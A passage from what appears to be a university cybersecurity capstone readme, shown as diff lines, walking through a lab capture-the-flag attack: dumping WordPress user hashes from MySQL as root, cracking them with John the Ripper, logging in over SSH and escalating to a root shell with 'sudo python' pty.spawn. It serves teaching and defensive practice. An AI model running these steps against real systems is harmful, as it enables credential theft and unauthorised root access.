Jay-Idrees/UPenn-CyberSecurity-Purple-Team-Defense-Hack-and-Attack-Mitigation-Capstone/readme.md

 - This reveals the password for root access to the mysql database

 - `mysql -u root -p` to log in to mysql and typing the password

+- After gaining access into the MYSQL server further information can be gathered by typing the following commands

+- `show databases`
+- `use wordpress`
+- `show tables`
+- `select * from wp_posts`
+- `select * from wp_users`

+- With the new information gathered, the hashes of the usernames can be accessed and copied into a text file for use by `John the Ripper`

+- `nano michael-steven_hashes.txt`

+- Once the passwords have been hacked.
+I can now login as Steven via SSH

+- `ssh steven@192.168.1.110`

+- Then you can attempt to acquire root access with `sudo python -c ‘import pty;pty.spawn(“/bin/bash”);’` and find flag 4